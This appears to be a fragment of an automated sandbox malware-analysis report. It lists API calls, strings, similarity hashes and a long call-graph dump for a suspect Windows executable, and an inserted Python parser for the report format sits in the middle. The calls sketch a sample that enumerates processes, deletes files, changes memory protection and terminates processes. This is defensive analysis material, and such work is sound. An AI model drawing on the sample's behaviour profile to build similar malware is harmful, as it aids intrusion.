                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateHandleProcess
                                                                                        • String ID: Error launching installer
                                                                                        • API String ID: 3712363035-66219284
                                                                                        • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                        • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                        • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                        • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                          • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                        • API String ID: 3509786178-2769509956
                                                                                        • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                        • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                        • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                        • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                        • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 190613189-0
                                                                                        • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                        • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                        • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                        • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4
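The function entries above all share one layout: an APIs list with call-site refs and inlined subcalls, a Strings list with xrefs, a Memory Dump Source, and a Similarity block carrying the API ID and the opcode and instruction fuzzy hashes. As an added example that is not part of the Joe Sandbox report, the following Python parser reads that layout into records so the entries can be searched by API name and grouped by API ID across many reports. The sample text is constructed from three entries shown above; the record, field and function names are this example's own choices, not Joe Sandbox identifiers.

```python
"""Parse the function-level "APIs / Strings / Similarity" entries of a Joe Sandbox
report into records that can be searched and clustered across many reports.
Added example; names below are this example's own, not Joe Sandbox's."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# One resolved call line, e.g. "ShowWindow.USER32(00000000,00000000), ref: 0040219F".
# The greedy args group is safe because ", ref: <addr>" always terminates the line.
API_RE = re.compile(
    r"^(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)
SUBCALL_PREFIX = "Part of subcall function "
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]                   # split on ','; the report does not quote arguments
    ref: str                          # call-site address inside the dumped module
    subcall_of: Optional[str] = None  # address of the callee the report inlined this call from


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[Tuple[str, str]] = field(default_factory=list)  # (string, xref address)
    source_file: str = ""
    similarity: Dict[str, str] = field(default_factory=dict)       # API ID, fuzzy hashes, ...

    def api_names(self) -> List[str]:
        return sorted({a.name for a in self.apis})


def _parse_call(item: str) -> Optional[ApiCall]:
    caller = None
    if item.startswith(SUBCALL_PREFIX):
        caller, _, item = item[len(SUBCALL_PREFIX):].partition(": ")
    m = API_RE.match(item)
    if not m:
        return None
    args = m["args"].split(",") if m["args"] else []
    return ApiCall(m["name"], m["module"], args, m["ref"], caller)


def parse_report(text: str) -> List[FunctionRecord]:
    """Every "APIs" header opens a new function record; bullets fill the current section."""
    records: List[FunctionRecord] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            if section == "APIs":
                records.append(FunctionRecord())
            continue
        if not line.startswith("• ") or not records:
            continue
        item, rec = line[2:], records[-1]
        if section == "APIs":
            call = _parse_call(item)
            if call:
                rec.apis.append(call)
        elif section == "Strings":
            s, sep, xref = item.rpartition(", xrefs: ")
            rec.strings.append((s, xref) if sep else (item, ""))
        elif section == "Memory Dump Source" and item.startswith("Source File: "):
            rec.source_file = item[len("Source File: "):].split(",")[0]
        elif section in ("Similarity", "Joe Sandbox IDA Plugin"):
            key, _, value = item.partition(":")
            rec.similarity[key.strip()] = value.strip()
    return records


def find_by_api(records: List[FunctionRecord], api: str) -> List[int]:
    """Indices of records that call `api` directly or through an inlined subcall."""
    return [i for i, r in enumerate(records) if any(c.name == api for c in r.apis)]


def cluster_by_api_id(records: List[FunctionRecord]) -> Dict[str, List[int]]:
    """Group records by the report's API ID, the key the report itself uses for similarity."""
    out: Dict[str, List[int]] = {}
    for i, r in enumerate(records):
        out.setdefault(r.similarity.get("API ID", ""), []).append(i)
    return out


# Constructed sample: three entries copied from the report, trimmed to the fields used here.
SAMPLE = """\
APIs
• ShowWindow.USER32(00000000,00000000), ref: 0040219F
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
• EnableWindow.USER32(00000000,00000000), ref: 004021AA
Strings
Similarity
• API ID: Window$EnableShowlstrlenwvsprintf
• String ID: HideWindow
APIs
• GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
• lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
Similarity
• API ID: PrivateProfileStringlstrcmp
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
• CloseHandle.KERNEL32(?), ref: 00405C71
Strings
• Error launching installer, xrefs: 00405C48
Memory Dump Source
• Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseCreateHandleProcess
• Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
"""

if __name__ == "__main__":
    for i, r in enumerate(parse_report(SAMPLE)):
        print(i, r.similarity.get("API ID"), r.api_names(), r.strings)
```

Arguments are split on commas because the report does not quote them, so an argument that itself contains a comma would be split too. Subcall lines keep the address of the function the report inlined them from, which is why find_by_api also matches calls that occur only inside an inlined callee.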

                                                                                        Execution Graph

                                                                                        Execution Coverage:4.1%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:2.4%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:112
                                                                                        execution_graph: rendered call-graph residue (node and edge listing) omitted; the listing is cut off at the end of the page. Entry node: aa9b8b. Recoverable node labels: Win32 calls CreateToolhelp32Snapshot / Process32FirstW / Process32NextW / FindCloseChangeNotification (process enumeration), LockWindowUpdate / DestroyWindow / GetMessageW / TranslateMessage / DispatchMessageW (window message loop), WaitForSingleObject / GetExitCodeProcess / CloseHandle (waiting on a child process), Sleep and timeGetTime, GetEnvironmentVariableW, CharUpperBuffW, GetStringTypeW, DecodePointer, RaiseException; CRT symbols __cinit, std::exception::exception, _free, _memmove, _wcscpy, __wsetenvp, __itow, __i64tow, __wtof_l, __wcstoi64, _iswctype, __gmtime64_s; recurring node annotation "Mailbox"; summarized library nodes of the form "<address> N API calls".
98557->98563 98559 aac324 timeGetTime 98719 aa5376 60 API calls 98559->98719 98560 b04148 66 API calls 98560->98574 98562 ae4440 GetExitCodeProcess 98566 ae446c CloseHandle 98562->98566 98567 ae4456 WaitForSingleObject 98562->98567 98563->98538 98563->98544 98563->98547 98563->98548 98563->98549 98563->98551 98563->98553 98563->98555 98563->98557 98563->98559 98564 aa4d37 84 API calls 98563->98564 98570 aa6d79 109 API calls 98563->98570 98563->98571 98563->98574 98579 aa5376 60 API calls 98563->98579 98582 aab020 252 API calls 98563->98582 98584 aac26d 98563->98584 98585 ab1a36 59 API calls 98563->98585 98588 b1c355 252 API calls 98563->98588 98589 aa39be 68 API calls 98563->98589 98591 b0a48d 89 API calls 98563->98591 98592 aaa820 252 API calls 98563->98592 98593 aa5190 59 API calls Mailbox 98563->98593 98594 aa53b0 252 API calls 98563->98594 98595 af6cf1 59 API calls Mailbox 98563->98595 98596 aa3a40 59 API calls 98563->98596 98597 ae3e13 VariantClear 98563->98597 98598 ae3ea9 VariantClear 98563->98598 98599 aa41c4 59 API calls Mailbox 98563->98599 98600 ae3c57 VariantClear 98563->98600 98601 af7aad 59 API calls 98563->98601 98602 aa3ea3 68 API calls 98563->98602 98649 aa52b0 98563->98649 98658 aa9a00 98563->98658 98665 aa9c80 98563->98665 98696 b0c270 98563->98696 98703 b1eedb 98563->98703 98711 b1e620 98563->98711 98714 b1e60c 98563->98714 98723 b26655 59 API calls 98563->98723 98724 b0a058 59 API calls Mailbox 98563->98724 98725 afe0aa 59 API calls 98563->98725 98726 af6c62 59 API calls 2 library calls 98563->98726 98727 aa38ff 59 API calls 98563->98727 98564->98563 98566->98574 98567->98563 98567->98566 98568 b26562 110 API calls 98568->98574 98570->98563 98571->98246 98572 ae38aa Sleep 98572->98563 98573 ae44c8 Sleep 98573->98563 98574->98550 98574->98551 98574->98556 98574->98560 98574->98562 98574->98563 98574->98568 98574->98571 98574->98572 98574->98573 98577 ab1a36 59 API calls 98574->98577 98581 aa3ea3 68 API calls 98574->98581 98728 b02baf 60 API 
calls 98574->98728 98729 aa5376 60 API calls 98574->98729 98730 aa6cd8 274 API calls 98574->98730 98731 af70e2 59 API calls 98574->98731 98732 b057ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98574->98732 98577->98574 98579->98563 98581->98574 98582->98563 98587 ab1a36 59 API calls 98584->98587 98585->98563 98587->98538 98588->98563 98589->98563 98591->98563 98592->98563 98593->98563 98594->98563 98595->98563 98596->98563 98597->98563 98598->98563 98599->98563 98600->98563 98601->98563 98602->98563 98608 add3b1 98607->98608 98610 aa3a53 98607->98610 98609 add3c1 98608->98609 99050 af6d17 59 API calls 98608->99050 98612 aa3a7d 98610->98612 98613 aa3b31 59 API calls 98610->98613 98617 aa3a9a Mailbox 98610->98617 98614 aa3a83 98612->98614 99041 aa3b31 98612->99041 98613->98612 98614->98617 99049 aa5190 59 API calls Mailbox 98614->99049 98617->98246 98618->98246 98619->98225 98620->98242 98621->98242 98622->98231 98623->98242 98624->98242 98625->98246 98626->98246 98627->98246 98628->98246 99052 aa3c30 98629->99052 98631 aa3eb3 98632 aa3f2d 98631->98632 98633 aa3ebd 98631->98633 98635 aa523c 59 API calls 98632->98635 98634 ac0fe6 Mailbox 59 API calls 98633->98634 98636 aa3ece 98634->98636 98644 aa3f1d 98635->98644 98637 aa3edc 98636->98637 98638 ab1207 59 API calls 98636->98638 98639 aa3eeb 98637->98639 98640 ab1bcc 59 API calls 98637->98640 98638->98637 98641 ac0fe6 Mailbox 59 API calls 98639->98641 98640->98639 98642 aa3ef5 98641->98642 99059 aa3bc8 68 API calls 98642->99059 98644->98246 98645->98242 98646->98246 98647->98242 98648->98526 98650 aa52c6 98649->98650 98652 aa5313 98649->98652 98651 aa52d3 PeekMessageW 98650->98651 98650->98652 98651->98652 98653 aa52ec 98651->98653 98652->98653 98655 addf68 TranslateAcceleratorW 98652->98655 98656 aa533e PeekMessageW 98652->98656 98657 aa5352 TranslateMessage DispatchMessageW 98652->98657 98733 aa359e 98652->98733 98653->98563 98655->98652 98655->98656 98656->98652 
98656->98653 98657->98656 98659 aa9a1d 98658->98659 98660 aa9a31 98658->98660 98738 aa94e0 98659->98738 98772 b0a48d 89 API calls 4 library calls 98660->98772 98662 aa9a28 98662->98563 98664 ae2478 98664->98664 98666 aa9cb5 98665->98666 98667 ae247d 98666->98667 98670 aa9d1f 98666->98670 98674 aa9d79 98666->98674 98668 aa53b0 274 API calls 98667->98668 98669 ae2492 98668->98669 98695 aa9f50 Mailbox 98669->98695 98793 b0a48d 89 API calls 4 library calls 98669->98793 98673 ab1207 59 API calls 98670->98673 98670->98674 98671 ab1207 59 API calls 98671->98674 98675 ae24d8 98673->98675 98674->98671 98676 ac2f70 __cinit 67 API calls 98674->98676 98678 ae24fa 98674->98678 98682 aa9f3a 98674->98682 98674->98695 98677 ac2f70 __cinit 67 API calls 98675->98677 98676->98674 98677->98674 98678->98563 98679 aa39be 68 API calls 98679->98695 98681 aa53b0 274 API calls 98681->98695 98682->98695 98794 b0a48d 89 API calls 4 library calls 98682->98794 98685 aaa775 98798 b0a48d 89 API calls 4 library calls 98685->98798 98687 ae27f9 98687->98563 98688 aa4230 59 API calls 98688->98695 98690 b0a48d 89 API calls 98690->98695 98694 aaa058 98694->98563 98695->98679 98695->98681 98695->98685 98695->98688 98695->98690 98695->98694 98789 ab1bcc 98695->98789 98795 af7aad 59 API calls 98695->98795 98796 b1ccac 274 API calls 98695->98796 98797 b1bc26 274 API calls Mailbox 98695->98797 98799 aa5190 59 API calls Mailbox 98695->98799 98800 b19ab0 274 API calls Mailbox 98695->98800 98697 aa4d37 84 API calls 98696->98697 98698 b0c286 98697->98698 98801 b04005 98698->98801 98700 b0c28e 98701 b0c292 GetLastError 98700->98701 98702 b0c2a7 98700->98702 98701->98702 98702->98563 98704 b1ef1e 98703->98704 98710 b1eef7 98703->98710 98705 b1ef40 98704->98705 98888 aa502b 59 API calls 98704->98888 98708 b1ef84 98705->98708 98705->98710 98889 aa502b 59 API calls 98705->98889 98855 b06818 98708->98855 98710->98563 98930 b1d1c6 98711->98930 98713 b1e630 98713->98563 98715 b1d1c6 130 API calls 98714->98715 98716 
b1e61c 98715->98716 98716->98563 98717->98533 98718->98540 98719->98563 98720->98541 98721->98541 98722->98541 98723->98563 98724->98563 98725->98563 98726->98563 98727->98563 98728->98574 98729->98574 98730->98574 98731->98574 98732->98574 98734 aa35b0 98733->98734 98735 aa35e2 98733->98735 98734->98735 98736 aa35d5 IsDialogMessageW 98734->98736 98737 add273 GetClassLongW 98734->98737 98735->98652 98736->98734 98736->98735 98737->98734 98737->98736 98739 aa53b0 274 API calls 98738->98739 98740 aa951f 98739->98740 98741 aa9527 _memmove 98740->98741 98742 ae2001 98740->98742 98744 aa9944 98741->98744 98747 aa9583 98741->98747 98748 ac0fe6 59 API calls Mailbox 98741->98748 98755 ae22c0 98741->98755 98756 aa96cf 98741->98756 98770 aa9741 98741->98770 98781 aa5190 59 API calls Mailbox 98742->98781 98752 ac0fe6 Mailbox 59 API calls 98744->98752 98746 ae22de 98746->98746 98747->98662 98748->98741 98749 aa986a 98750 aa987f 98749->98750 98751 ae22b1 98749->98751 98753 ac0fe6 Mailbox 59 API calls 98750->98753 98786 b1a983 59 API calls 98751->98786 98762 aa96e3 _memmove 98752->98762 98765 aa977d 98753->98765 98787 b0a48d 89 API calls 4 library calls 98755->98787 98756->98744 98758 aa96dc 98756->98758 98757 ac0fe6 Mailbox 59 API calls 98761 aa970e 98757->98761 98760 ac0fe6 Mailbox 59 API calls 98758->98760 98759 ae22a0 98785 b0a48d 89 API calls 4 library calls 98759->98785 98760->98762 98761->98770 98773 aacca0 98761->98773 98762->98757 98762->98761 98762->98770 98765->98662 98767 ae2278 98784 b0a48d 89 API calls 4 library calls 98767->98784 98769 ae2253 98783 b0a48d 89 API calls 4 library calls 98769->98783 98770->98749 98770->98759 98770->98765 98770->98767 98770->98769 98782 aa8180 274 API calls 98770->98782 98772->98664 98774 aaccda 98773->98774 98775 aacd02 98773->98775 98776 aa9c80 274 API calls 98774->98776 98778 aacce0 98774->98778 98777 aa53b0 274 API calls 98775->98777 98775->98778 98779 ae4971 98775->98779 98776->98778 98777->98779 98778->98770 98779->98778 98788 
b0a48d 89 API calls 4 library calls 98779->98788 98781->98744 98782->98770 98783->98765 98784->98765 98785->98765 98786->98755 98787->98746 98788->98778 98790 ab1bef _memmove 98789->98790 98791 ab1bdc 98789->98791 98790->98695 98791->98790 98792 ac0fe6 Mailbox 59 API calls 98791->98792 98792->98790 98793->98695 98794->98695 98795->98695 98796->98695 98797->98695 98798->98687 98799->98695 98800->98695 98802 ab1207 59 API calls 98801->98802 98803 b04024 98802->98803 98804 ab1207 59 API calls 98803->98804 98805 b0402d 98804->98805 98806 ab1207 59 API calls 98805->98806 98807 b04036 98806->98807 98825 ac0284 98807->98825 98812 b0405c 98814 ac0119 59 API calls 98812->98814 98813 ab1900 59 API calls 98813->98812 98815 b04070 FindFirstFileW 98814->98815 98816 b040fc FindClose 98815->98816 98819 b0408f 98815->98819 98821 b04107 Mailbox 98816->98821 98817 b040d7 FindNextFileW 98817->98819 98818 ab1c9c 59 API calls 98818->98819 98819->98816 98819->98817 98819->98818 98820 ab17e0 59 API calls 98819->98820 98837 ab1900 98819->98837 98820->98819 98821->98700 98824 b040f3 FindClose 98824->98821 98844 ad1b70 98825->98844 98828 ac02cd 98831 ab19e1 59 API calls 98828->98831 98829 ac02b0 98830 ab1821 59 API calls 98829->98830 98832 ac02bc 98830->98832 98831->98832 98846 ab133d 98832->98846 98835 b04fec GetFileAttributesW 98836 b0404a 98835->98836 98836->98812 98836->98813 98838 aef534 98837->98838 98839 ab1914 98837->98839 98841 ab1c7e 59 API calls 98838->98841 98850 ab18a5 98839->98850 98843 aef53f __wsetenvp _memmove 98841->98843 98842 ab191f DeleteFileW 98842->98817 98842->98824 98845 ac0291 GetFullPathNameW 98844->98845 98845->98828 98845->98829 98847 ab134b 98846->98847 98848 ab1981 59 API calls 98847->98848 98849 ab135b 98848->98849 98849->98835 98851 ab18b4 __wsetenvp 98850->98851 98852 ab18c5 _memmove 98851->98852 98853 ab1c7e 59 API calls 98851->98853 98852->98842 98854 aef4f1 _memmove 98853->98854 98890 b06735 98855->98890 98858 b068b1 98861 b06921 98858->98861 98864 
b06917 98858->98864 98869 b068ca 98858->98869 98859 b06899 98906 b06a73 89 API calls 2 library calls 98859->98906 98862 b06951 98861->98862 98863 b0699f 98861->98863 98885 b0683d _memmove 98861->98885 98867 b06971 98862->98867 98868 b06956 98862->98868 98865 b069a6 98863->98865 98866 b06a3a 98863->98866 98864->98861 98870 b068fe 98864->98870 98871 b069a9 98865->98871 98872 b06a1c 98865->98872 98866->98885 98915 aa50d5 59 API calls 98866->98915 98867->98885 98911 aa5087 59 API calls 98867->98911 98868->98885 98910 aa5087 59 API calls 98868->98910 98907 b08cd0 61 API calls 98869->98907 98897 b07c7f 98870->98897 98876 b069e5 98871->98876 98877 b069ad 98871->98877 98872->98885 98914 aa50d5 59 API calls 98872->98914 98876->98885 98913 aa50d5 59 API calls 98876->98913 98877->98885 98912 aa50d5 59 API calls 98877->98912 98882 b068d2 98908 b08cd0 61 API calls 98882->98908 98885->98710 98886 b068e9 _memmove 98909 b08cd0 61 API calls 98886->98909 98888->98705 98889->98708 98891 b06785 98890->98891 98895 b06746 98890->98895 98926 aa502b 59 API calls 98891->98926 98892 b06783 98892->98858 98892->98859 98892->98885 98894 aa4d37 84 API calls 98894->98895 98895->98892 98895->98894 98916 ac312d 98895->98916 98898 b07c8a 98897->98898 98899 ac0fe6 Mailbox 59 API calls 98898->98899 98900 b07c91 98899->98900 98901 b07c9d 98900->98901 98902 b07cbe 98900->98902 98903 ac0fe6 Mailbox 59 API calls 98901->98903 98904 ac0fe6 Mailbox 59 API calls 98902->98904 98905 b07ca6 _memset 98903->98905 98904->98905 98905->98885 98906->98885 98907->98882 98908->98886 98909->98870 98910->98885 98911->98885 98912->98885 98913->98885 98914->98885 98915->98885 98917 ac31ae 98916->98917 98918 ac3139 98916->98918 98929 ac31c0 60 API calls 4 library calls 98917->98929 98925 ac315e 98918->98925 98927 ac8d58 58 API calls __getptd_noexit 98918->98927 98920 ac31bb 98920->98895 98922 ac3145 98928 ac8fe6 9 API calls __ftell_nolock 98922->98928 98924 ac3150 98924->98895 98925->98895 98926->98892 98927->98922 
98928->98924 98929->98920 98931 aa4d37 84 API calls 98930->98931 98932 b1d203 98931->98932 98951 b1d24a Mailbox 98932->98951 98968 b1de8e 98932->98968 98934 b1d4a2 98935 b1d617 98934->98935 98939 b1d4b0 98934->98939 99018 b1dfb1 92 API calls Mailbox 98935->99018 98938 b1d626 98938->98939 98940 b1d632 98938->98940 98981 b1d057 98939->98981 98940->98951 98941 aa4d37 84 API calls 98959 b1d29b Mailbox 98941->98959 98946 b1d4e9 98996 ac0e38 98946->98996 98949 b1d503 99003 b0a48d 89 API calls 4 library calls 98949->99003 98950 b1d51c 99004 aa47be 98950->99004 98951->98713 98955 b1d50e GetCurrentProcess TerminateProcess 98955->98950 98959->98934 98959->98941 98959->98951 99001 b0fc0d 59 API calls 2 library calls 98959->99001 99002 b1d6c8 61 API calls 2 library calls 98959->99002 98960 b1d68d 98960->98951 98964 b1d6a1 FreeLibrary 98960->98964 98961 b1d554 99016 b1dd32 107 API calls _free 98961->99016 98964->98951 98966 b1d565 98966->98960 98967 aa523c 59 API calls 98966->98967 99017 aa4230 59 API calls Mailbox 98966->99017 99019 b1dd32 107 API calls _free 98966->99019 98967->98966 98969 ab1aa4 59 API calls 98968->98969 98970 b1dea9 CharLowerBuffW 98969->98970 99020 aff903 98970->99020 98974 ab1207 59 API calls 98975 b1dee2 98974->98975 98976 ab1462 59 API calls 98975->98976 98977 b1def9 98976->98977 98978 ab1981 59 API calls 98977->98978 98979 b1df05 Mailbox 98978->98979 98980 b1df41 Mailbox 98979->98980 99027 b1d6c8 61 API calls 2 library calls 98979->99027 98980->98959 98982 b1d072 98981->98982 98986 b1d0c7 98981->98986 98983 ac0fe6 Mailbox 59 API calls 98982->98983 98984 b1d094 98983->98984 98985 ac0fe6 Mailbox 59 API calls 98984->98985 98984->98986 98985->98984 98987 b1e139 98986->98987 98988 b1e362 Mailbox 98987->98988 98995 b1e15c _strcat _wcscpy __wsetenvp 98987->98995 98988->98946 98989 aa50d5 59 API calls 98989->98995 98990 aa502b 59 API calls 98990->98995 98991 aa5087 59 API calls 98991->98995 98992 aa4d37 84 API calls 98992->98995 98993 ac593c 58 API calls 
__crtLCMapStringA_stat 98993->98995 98995->98988 98995->98989 98995->98990 98995->98991 98995->98992 98995->98993 99030 b05e42 61 API calls 2 library calls 98995->99030 98997 ac0e4d 98996->98997 98998 ac0ee5 NtProtectVirtualMemory 98997->98998 98999 ac0eb3 98997->98999 99000 ac0ed3 FindCloseChangeNotification 98997->99000 98998->98999 98999->98949 98999->98950 99000->98999 99001->98959 99002->98959 99003->98955 99005 aa47c6 99004->99005 99006 ac0fe6 Mailbox 59 API calls 99005->99006 99007 aa47d4 99006->99007 99008 aa47e0 99007->99008 99031 aa46ec 59 API calls Mailbox 99007->99031 99010 aa4540 99008->99010 99032 aa4650 99010->99032 99012 aa454f 99013 ac0fe6 Mailbox 59 API calls 99012->99013 99014 aa45eb 99012->99014 99013->99014 99014->98966 99015 aa4230 59 API calls Mailbox 99014->99015 99015->98961 99016->98966 99017->98966 99018->98938 99019->98966 99022 aff92e __wsetenvp 99020->99022 99021 aff96d 99021->98974 99021->98979 99022->99021 99023 aff963 99022->99023 99025 affa14 99022->99025 99023->99021 99028 ab14db 61 API calls 99023->99028 99025->99021 99029 ab14db 61 API calls 99025->99029 99027->98980 99028->99023 99029->99025 99030->98995 99031->99008 99033 aa4659 Mailbox 99032->99033 99034 add6ec 99033->99034 99039 aa4663 99033->99039 99035 ac0fe6 Mailbox 59 API calls 99034->99035 99037 add6f8 99035->99037 99036 aa466a 99036->99012 99039->99036 99040 aa5190 59 API calls Mailbox 99039->99040 99040->99039 99042 aa3b3f 99041->99042 99048 aa3b67 99041->99048 99043 aa3b4d 99042->99043 99044 aa3b31 59 API calls 99042->99044 99045 aa3b53 99043->99045 99046 aa3b31 59 API calls 99043->99046 99044->99043 99045->99048 99051 aa5190 59 API calls Mailbox 99045->99051 99046->99045 99048->98614 99049->98617 99050->98609 99051->99048 99053 aa3c43 99052->99053 99054 aa3e11 99052->99054 99055 ab1207 59 API calls 99053->99055 99058 aa3c54 99053->99058 99054->98631 99056 aa3e73 99055->99056 99057 ac2f70 __cinit 67 API calls 99056->99057 99057->99058 99058->98631 99059->98644 
99060->98271 99061->98268 99062->98167 99063->98163 99064->98165 99065->98163 99066->98164 99068 ac59b7 99067->99068 99072 ac5948 99067->99072 99093 ac35d1 DecodePointer 99068->99093 99070 ac59bd 99094 ac8d58 58 API calls __getptd_noexit 99070->99094 99071 ac5953 99071->99072 99087 aca39b 58 API calls __NMSG_WRITE 99071->99087 99088 aca3f8 58 API calls 6 library calls 99071->99088 99089 ac32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99071->99089 99072->99071 99075 ac597b RtlAllocateHeap 99072->99075 99078 ac59a3 99072->99078 99082 ac59a1 99072->99082 99090 ac35d1 DecodePointer 99072->99090 99075->99072 99076 ac59af 99075->99076 99076->98172 99091 ac8d58 58 API calls __getptd_noexit 99078->99091 99092 ac8d58 58 API calls __getptd_noexit 99082->99092 99084->98172 99085->98177 99086->98179 99087->99071 99088->99071 99090->99072 99091->99082 99092->99076 99093->99070 99094->99076 99096 ac2e80 ___lock_fhandle 99095->99096 99103 ac3447 99096->99103 99102 ac2ea7 ___lock_fhandle 99102->98077 99120 ac9e3b 99103->99120 99105 ac2e89 99106 ac2eb8 DecodePointer DecodePointer 99105->99106 99107 ac2ee5 99106->99107 99108 ac2e95 99106->99108 99107->99108 99166 ac89d4 59 API calls 2 library calls 99107->99166 99117 ac2eb2 99108->99117 99110 ac2f48 EncodePointer EncodePointer 99110->99108 99111 ac2ef7 99111->99110 99112 ac2f1c 99111->99112 99167 ac8a94 61 API calls __realloc_crt 99111->99167 99112->99108 99116 ac2f36 EncodePointer 99112->99116 99168 ac8a94 61 API calls __realloc_crt 99112->99168 99115 ac2f30 99115->99108 99115->99116 99116->99110 99169 ac3450 99117->99169 99121 ac9e4c 99120->99121 99122 ac9e5f EnterCriticalSection 99120->99122 99127 ac9ec3 99121->99127 99122->99105 99124 ac9e52 99124->99122 99151 ac32e5 58 API calls 3 library calls 99124->99151 99128 ac9ecf ___lock_fhandle 99127->99128 99129 ac9ed8 99128->99129 99130 ac9ef0 99128->99130 99152 aca39b 58 API calls __NMSG_WRITE 99129->99152 99138 ac9f11 ___lock_fhandle 99130->99138 